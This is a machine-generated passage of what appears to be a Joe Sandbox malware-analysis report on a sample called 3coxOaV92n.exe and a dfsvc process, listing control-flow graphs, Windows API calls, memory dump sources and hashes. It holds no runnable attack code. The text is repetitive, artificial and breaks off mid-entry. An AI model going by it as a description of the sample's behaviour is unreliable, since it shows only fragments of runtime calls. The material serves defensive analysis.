                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC62E9
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC62F4
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 776569668-0

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 342 ac23d1-ac23d8 343 ac23dd-ac23f8 GetLastError call ac26a4 342->343 344 ac23da-ac23dc 342->344 347 ac23fa-ac23fc 343->347 348 ac2411-ac2413 343->348 349 ac23fe-ac240f call ac26df 347->349 350 ac2457-ac2462 SetLastError 347->350 348->350 349->348 353 ac2415-ac2425 call ac3f67 349->353 356 ac2439-ac2449 call ac26df 353->356 357 ac2427-ac2437 call ac26df 353->357 363 ac244f-ac2456 call ac3ec5 356->363 357->356 362 ac244b-ac244d 357->362 362->363 363->350
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00AC23C8,00AC209F,00AC1AFC), ref: 00AC23DF
                                                                                                                                                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00AC23ED
                                                                                                                                                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00AC2406
                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,00AC23C8,00AC209F,00AC1AFC), ref: 00AC2458
Memory Dump Source
• Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
• Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3852720340-0

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 366 ac4424-ac4438 GetLastError 367 ac443a-ac4444 call ac5904 366->367 368 ac4446-ac444b 366->368 367->368 373 ac448f-ac449a SetLastError 367->373 370 ac444d call ac480c 368->370 372 ac4452-ac4458 370->372 374 ac445a 372->374 375 ac4463-ac4471 call ac595a 372->375 377 ac445b-ac4461 call ac4869 374->377 380 ac4476-ac448d call ac4296 call ac4869 375->380 381 ac4473-ac4474 375->381 383 ac449b-ac44a7 SetLastError call ac3f24 377->383 380->373 380->383 381->377
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(00000008,?,00AC6D69,?,?,?,00AD04C8,0000002C,00AC3F34,00000016,00AC209F,00AC1AFC), ref: 00AC4428
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC445B
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC4483
                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 00AC4490
                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 00AC449C
                                                                                                                                                                                                                                                        • _abort.LIBCMT ref: 00AC44A2
Memory Dump Source
• Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
• Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3160817290-0

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 390 ac36fc-ac3724 GetModuleHandleExW 391 ac3749-ac374d 390->391 392 ac3726-ac3739 GetProcAddress 390->392 395 ac374f-ac3752 FreeLibrary 391->395 396 ac3758-ac3765 call ac123a 391->396 393 ac3748 392->393 394 ac373b-ac3746 392->394 393->391 394->393 395->396
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00AC36AD,?,?,00AC364D,?,00AD02E0,0000000C,00AC37A4,?,00000002), ref: 00AC371C
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00AC372F
                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00AC36AD,?,?,00AC364D,?,00AD02E0,0000000C,00AC37A4,?,00000002,00000000), ref: 00AC3752
                                                                                                                                                                                                                                                        Strings
Memory Dump Source
• Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
• Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                        • API String ID: 4061214504-1276376045

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 400 ac634d-ac6372 call ac3f72 403 ac637f-ac63a5 MultiByteToWideChar 400->403 404 ac6374-ac637c 400->404 405 ac63ab-ac63b7 403->405 406 ac6444-ac6448 403->406 404->403 409 ac63b9-ac63ca 405->409 410 ac6403 405->410 407 ac644a-ac644d 406->407 408 ac6454-ac6469 call ac123a 406->408 407->408 413 ac63cc-ac63db call acac20 409->413 414 ac63e5-ac63eb 409->414 412 ac6405-ac6407 410->412 418 ac643d-ac6443 call ac646a 412->418 419 ac6409-ac642b call ac20b0 MultiByteToWideChar 412->419 413->418 425 ac63dd-ac63e3 413->425 416 ac63ec call ac62ff 414->416 421 ac63f1-ac63f6 416->421 418->406 419->418 429 ac642d-ac643b GetStringTypeW 419->429 421->418 426 ac63f8 421->426 428 ac63fe-ac6401 425->428 426->428 428->412 429->418
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,00AC54C8,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 00AC639A
                                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00AC63D2
                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00AC6423
                                                                                                                                                                                                                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00AC6435
                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00AC643E
                                                                                                                                                                                                                                                          • Part of subcall function 00AC62FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00AC7E5B,?,00000000,?,00AC686F,?,00000004,00000000,?,?,?,00AC3BCD), ref: 00AC6331
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1857427562-0
                                                                                                                                                                                                                                                        • Opcode ID: 372e7c4caf38ca781b2ba26e0afec53ebb67542734ced9b78a9dcba5953329ad
                                                                                                                                                                                                                                                        • Instruction ID: 7a0a2b6c8af34415844d8a5b3334009891febce4da0abdbed75e3beefc7ffcb0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 372e7c4caf38ca781b2ba26e0afec53ebb67542734ced9b78a9dcba5953329ad
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2831B072A1021AABDF29DFA4DD45EAE7BA5EF00310F06412DFC14DA250EB35CD51CBA0

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        control_flow_graph 430 ac561e-ac5633 GetEnvironmentStringsW 431 ac568b 430->431 432 ac5635-ac5655 call ac55e7 WideCharToMultiByte 430->432 433 ac568d-ac568f 431->433 432->431 438 ac5657 432->438 435 ac5698-ac56a0 433->435 436 ac5691-ac5692 FreeEnvironmentStringsW 433->436 436->435 439 ac5658 call ac62ff 438->439 440 ac565d-ac5662 439->440 441 ac5664-ac5678 WideCharToMultiByte 440->441 442 ac5680 440->442 441->442 443 ac567a-ac567e 441->443 444 ac5682-ac5689 call ac4869 442->444 443->444 444->433
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 00AC5627
                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00AC564A
                                                                                                                                                                                                                                                          • Part of subcall function 00AC62FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00AC7E5B,?,00000000,?,00AC686F,?,00000004,00000000,?,?,?,00AC3BCD), ref: 00AC6331
                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00AC5670
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC5683
                                                                                                                                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00AC5692
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2278895681-0
                                                                                                                                                                                                                                                        • Opcode ID: 3554cd88993eb7e2b61d49f3b53d4d35249dc659d4e36b70e8c0f10350533ad3
                                                                                                                                                                                                                                                        • Instruction ID: 84e2395dabeb1931112c60ac1ea4506e5bf1450cf3e5309e2b317f497992f05e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3554cd88993eb7e2b61d49f3b53d4d35249dc659d4e36b70e8c0f10350533ad3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F201F772A01A157F27215BB65C4DE7B6ABDDEC6BA035B012DF804C3100EB619C0282B0

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        control_flow_graph 447 ac44a8-ac44bf GetLastError 448 ac44cd-ac44d2 447->448 449 ac44c1-ac44cb call ac5904 447->449 451 ac44d4 call ac480c 448->451 449->448 454 ac451e-ac4525 SetLastError 449->454 453 ac44d9-ac44df 451->453 455 ac44ea-ac44f8 call ac595a 453->455 456 ac44e1 453->456 457 ac4527-ac452c 454->457 463 ac44fd-ac4513 call ac4296 call ac4869 455->463 464 ac44fa-ac44fb 455->464 458 ac44e2-ac44e8 call ac4869 456->458 466 ac4515-ac451c SetLastError 458->466 463->454 463->466 464->458 466->457
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00AC47FE,00AC7E79,?,00AC686F,?,00000004,00000000,?,?,?,00AC3BCD,?,00000000), ref: 00AC44AD
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC44E2
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC4509
                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 00AC4516
                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 00AC451F
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3170660625-0
                                                                                                                                                                                                                                                        • Opcode ID: 5457023e59e251497171e3170c4705edfe72f80e8a9b3dabbe65d4865b307fc0
                                                                                                                                                                                                                                                        • Instruction ID: 62259c50762e623aae8b916d3a72743ddf767c138f04f6e013371f5f40c63f94
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5457023e59e251497171e3170c4705edfe72f80e8a9b3dabbe65d4865b307fc0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7C01F936600604BB9216B7B46D66F2B366DABDD371B37412DF42AD2182FF318D024228

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        control_flow_graph 470 ac6176-ac6181 471 ac61dc-ac61de 470->471 472 ac6183-ac618b 470->472 473 ac618d-ac6193 call ac4869 472->473 474 ac6194-ac619d 472->474 473->474 476 ac619f-ac61a5 call ac4869 474->476 477 ac61a6-ac61af 474->477 476->477 480 ac61b8-ac61c1 477->480 481 ac61b1-ac61b7 call ac4869 477->481 482 ac61ca-ac61d3 480->482 483 ac61c3-ac61c9 call ac4869 480->483 481->480 482->471 487 ac61d5-ac61db call ac4869 482->487 483->482 487->471
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC618E
                                                                                                                                                                                                                                                          • Part of subcall function 00AC4869: HeapFree.KERNEL32(00000000,00000000,?,00AC620D,?,00000000,?,00000000,?,00AC6234,?,00000007,?,?,00AC669F,?), ref: 00AC487F
                                                                                                                                                                                                                                                          • Part of subcall function 00AC4869: GetLastError.KERNEL32(?,?,00AC620D,?,00000000,?,00000000,?,00AC6234,?,00000007,?,?,00AC669F,?,?), ref: 00AC4891
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC61A0
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC61B2
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC61C4
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC61D6
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                                        • Opcode ID: e3d85022c81707823fadb8f7d2c56ede190a551edbc812254d94d6414d94bb0e
                                                                                                                                                                                                                                                        • Instruction ID: 429438bcaa5cb6486c379859c62003e2c1b1655faec7b5d794db7238c0b0232d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e3d85022c81707823fadb8f7d2c56ede190a551edbc812254d94d6414d94bb0e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B9F0F636601200BF9660EF95FA91E5A37EDAA44B1171E080EF00ED7442C734FC818754
APIs
• _free.LIBCMT ref: 00AC3DAD
  • Part of subcall function 00AC4869: HeapFree.KERNEL32(00000000,00000000,?,00AC620D,?,00000000,?,00000000,?,00AC6234,?,00000007,?,?,00AC669F,?), ref: 00AC487F
  • Part of subcall function 00AC4869: GetLastError.KERNEL32(?,?,00AC620D,?,00000000,?,00000000,?,00AC6234,?,00000007,?,?,00AC669F,?,?), ref: 00AC4891
• _free.LIBCMT ref: 00AC3DBF
• _free.LIBCMT ref: 00AC3DD2
• _free.LIBCMT ref: 00AC3DE3
• _free.LIBCMT ref: 00AC3DF4
Memory Dump Source
• Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
• Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
• GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\3coxOaV92n.exe,00000104), ref: 00AC2F93
• _free.LIBCMT ref: 00AC305E
• _free.LIBCMT ref: 00AC3068
Strings
Memory Dump Source
• Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
• Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
Similarity
• API ID: _free$FileModuleName
• String ID: C:\Users\user\Desktop\3coxOaV92n.exe
• API String ID: 2506810119-4138872258
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00AC2594,00000000,?,00AD1B50,?,?,?,00AC2737,00000004,InitializeCriticalSectionEx,00ACBC48,InitializeCriticalSectionEx), ref: 00AC25F0
• GetLastError.KERNEL32(?,00AC2594,00000000,?,00AD1B50,?,?,?,00AC2737,00000004,InitializeCriticalSectionEx,00ACBC48,InitializeCriticalSectionEx,00000000,?,00AC24C7), ref: 00AC25FA
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00AC2622
Strings
Memory Dump Source
• Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
• Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID: api-ms-
• API String ID: 3177248105-2084034818
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00AC5784,00000000,00000000,00000000,00000000,?,00AC5981,00000006,FlsSetValue), ref: 00AC580F
• GetLastError.KERNEL32(?,00AC5784,00000000,00000000,00000000,00000000,?,00AC5981,00000006,FlsSetValue,00ACC4D8,FlsSetValue,00000000,00000364,?,00AC44F6), ref: 00AC581B
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00AC5784,00000000,00000000,00000000,00000000,?,00AC5981,00000006,FlsSetValue,00ACC4D8,FlsSetValue,00000000), ref: 00AC5829
Memory Dump Source
• Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
• Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
APIs
• _free.LIBCMT ref: 00AC4A27
  • Part of subcall function 00AC474D: IsProcessorFeaturePresent.KERNEL32(00000017,00AC473C,00000000,?,00000004,00000000,?,?,?,?,00AC4749,00000000,00000000,00000000,00000000,00000000), ref: 00AC474F
  • Part of subcall function 00AC474D: GetCurrentProcess.KERNEL32(C0000417), ref: 00AC4771
  • Part of subcall function 00AC474D: TerminateProcess.KERNEL32(00000000), ref: 00AC4778
Strings
Memory Dump Source
• Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
• Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
Similarity
• API ID: Process$CurrentFeaturePresentProcessorTerminate_free
• String ID: *?$.
• API String ID: 2667617558-3972193922
                                                                                                                                                                                                                                                        • Opcode ID: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
                                                                                                                                                                                                                                                        • Instruction ID: 6f6d35a278370c95911547e3520750006d3c57eb57229880de07ff66f4586792
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1A518E75E00219AFDF14CFA8C891EAEBBB5EF5C310F26816EE454E7341E6319E018B54

                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                        Execution Coverage:17.9%
                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                                                        Total number of Nodes:435
                                                                                                                                                                                                                                                        Total number of Limit Nodes:52

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2925977816.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff848e80000_dfsvc.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 5791b3442a72e5ab37a26a751a1a2a7d752b5a967dff395a8b46c2031debb756
                                                                                                                                                                                                                                                        • Instruction ID: 45793d6d940f102490ed32277574eb38468e9f144cd910e9cee8ac97685db931
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5791b3442a72e5ab37a26a751a1a2a7d752b5a967dff395a8b46c2031debb756
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C7B13531E0DA895FE749EB7858192BD3BE1FF56750F8841BAC009C7293EF3AA8058345

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2925977816.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff848e80000_dfsvc.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CookieInternet
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 930238652-0
                                                                                                                                                                                                                                                        • Opcode ID: 86a3a226304ed89c5081f50aa56f6a2b88f7f0fb1351bbbb7a3e869969555de6
